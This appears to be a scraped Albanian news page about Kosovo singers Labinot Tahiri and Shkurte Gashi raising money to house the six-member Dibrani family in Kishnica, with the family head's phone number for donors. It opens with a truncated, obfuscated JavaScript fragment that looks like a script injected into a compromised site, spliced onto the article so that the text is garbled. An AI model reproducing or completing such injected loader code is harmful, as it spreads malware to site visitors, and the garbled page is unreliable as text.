;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Yjet mobilizohen për të ndihmuar familjen Dibrani

By

Edicioni i djeshëm informativ i lajmeve në Klan Kosova portretizoi gjendjen e rëndë të familjes gjashtë anëtarëshe Dibrani nga Kishnica që jetonte në një hapësirë prej vetëm 12 metrash katrorë.

E është estrada shqiptare ajo që është mobilizuar për t’i dhënë fund skamjes për këtë familje.

Këngëtari Labinot Tahiri që këtë vit ka ndihmuar dhjetëra raste është nisur menjëherë drejt vendit ku jetojnë anëtarët e kësaj familje dhe madje ka nisur të grumbullojë të holla.

Të keni kujdes, unë e kam marr përsipër të i’a blejjmë Banesen ose shtëpien. Nëse do të ja ndan tokën Kryetari i Graçanices,,ne do i ndertojmë shtëpien, në qoftëse jo, atëherë do t’ia blejm një Banes. Po mundohemi t’ia blejmë Banesen përshkak se fëmijet janë të semurë.! Vlera maximale deri 30,000 euro! Ne do mundohemi sa më lirë ta gjejmë. – ka shkruar Labi.

Të njejtës rrugë i ka hyrë edhe Shkurte Gashi që përmes profilit të saj në Instagram ka bërë thirrje që të kontribohet për këtë rast.

Prive mëson se Shkurta ka kontaktuar edhe kolegët e tjerë të saj për të grumbulluar sasinë e nevojshme të parave që familjes Dibrani t’i mundësohet një strehë.

Të gjithë ata që duan të ndihmojnë këtë familje ju lutemi kontaktoni kryefamiljarin, Bedri Dibrani, në këtë numër telefoni 044 677 221. Shtëpia e kësaj familje është pranë ambulantes së vjetër në Kishnicë te Graçanicës.

 

Artikuj të ngjashëm